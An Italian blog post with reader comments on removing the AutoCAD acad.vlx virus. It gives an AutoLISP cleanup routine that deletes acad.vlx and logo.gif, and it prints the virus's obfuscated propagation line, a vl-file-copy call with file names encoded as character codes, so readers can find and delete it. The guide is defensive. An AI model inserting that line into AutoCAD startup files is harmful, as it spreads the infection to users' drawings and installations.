domenica 5 febbraio 2012

Rimozione del virus di AutoCad acad.vlx

Trattasi di virus mirato, infatti colpisce solo i possessori dell'ultime release di AutoCad e si propaga attraverso i relativi disegni in formato .dwg . Per una efficiente pulizia è sufficiente seguire le indicazioni pubblicate dall'AutoDesk stessa nel seguente link.


In pratica, riepilogo i passaggi fondamentali:

  •  posizionatevi nella cartella support della vostra installazione (es. C:\Programmi\AutoCad 20xx\Support)
  • cercate il seguente files acad20xx.lsp e apritelo con blocco note e aggiungete in fondo le seguenti righe di codice che si preoccupa di cancellare i files infetti acad.vlx e logo.gif:  
(defun cleanvirus( / lspfiles lspfile x)
  (setq lspfiles '("acad.vlx" "logo.gif"))
  (foreach lspfile lspfiles
    (while (setq x (findfile lspfile))
      (progn
        (vl-file-delete x)
        (princ "\nDeleted file ")
        (princ x)
      );progn
    );while
  );foreach
)
(cleanvirus)

  •  aprite i seguenti files ove presenti:
C:\Programmi\AutoCAD 20xx\Express\acetauto.lsp
C:\Programmi\AutoCAD 20xx\Support\ai_utils.lsp
ROAMABLEROOTPREFIX\Support\acad.mnl

e sostituite  ROAMABLEROOTPREFIX con la corrispettiva variabile di ambiente.


  • cercate le seguenti linee di codice e se presenti elimantele, chiudete e salvati i files:
(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

11 commenti:

  1. Grazie!
    Non sapevo proprio come fare!
    Tito Geno

    RispondiElimina
  2. Al punto seguente:
    -aprite i seguenti files ove presenti:
    C:\Programmi\AutoCAD 20xx\Express\acetauto.lsp
    C:\Programmi\AutoCAD 20xx\Support\ai_utils.lsp
    ROAMABLEROOTPREFIX\Support\acad.mnl
    Non ho capito cosa dovrei fare, un aiutino?

    RispondiElimina
  3. Salve, mi sarebbe utile sapere come procedere per effettuare correttamente i seguenti passaggi:
    -Aprite i seguenti files ove presenti:
    C:\Programmi\AutoCAD 20xx\Express\acetauto.lsp
    C:\Programmi\AutoCAD 20xx\Support\ai_utils.lsp
    ROAMABLEROOTPREFIX\Support\acad.mnl
    e sostituite ROAMABLEROOTPREFIX con la corrispettiva variabile di ambiente.

    -Cercate le seguenti linee di codice e se presenti elimantele, chiudete e salvati i files:
    (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
    Grazie in anticipo

    RispondiElimina
  4. In effetti, rileggendo il post non è molto chiaro, così come non è chiarissimo nella documentazione di AutoDesk, comunque vedo di corregerlo, in pratica io suggerirei di cercare i files acetauto.lsp e ai_utils.lsp e acad.mnl con lo strumento di ricerca files del vostro sistema operativo, avendo l'accortezza di estendere la ricerca a tutto il disco, compresi i files nascosti e di sistema. Questo perchè mi è capitato che a seconda della versione di AutoCad si possono trovare anche in percorsi leggermente diversi da quelli sopraindicati, oppure non essere neanche presenti. Una volta individuati, devono essere aperti con blocco note, all'interno di essi cercare la stringa di codice evindenziata nell'articolo e cancellarla, anche qui se presente.

    RispondiElimina
    Risposte
    1. Aspetto la correzzione dell'articolo, grazie mille per aver risposto prontamente!

      Elimina
    2. Appena ho un attimo, sistemo tutto! Grazie

      Elimina
    3. potresti sistemare per favore?

      Elimina
    4. Guarda la soluzione per poter andare avanti comunque lo scritta nel post precedente, sinceramente non ho il tempo di sistemare l'articolo in questo momento, quindi segui le indicazioni che ti ho dato e dovresti risolvere il problema.

      Elimina
    5. Ciao, ho provato ad aprire il file acad20xx.lsp, ho aggiunto in fondo le righe di codice consigliate, ma al momento di chiudere e salvare il file blocco note, mi dice accesso negato e non posso salvare le modifiche apportate. Cosa dovrei fare per superare questo intoppo. Grazie.

      Elimina
    6. Dovrebbe essere un problema di autorizzazioni dell'utente, facendo tasto destro proprietà sul file in questione, nella scheda sicurezza probabilmente hai diritti di sola lettura, aggiungi il segno di spunta su modifica relativo al tuo nome utente. Fatto questo procedi con la modifica del file e dovrebbe consentirti il salvataggio.

      Elimina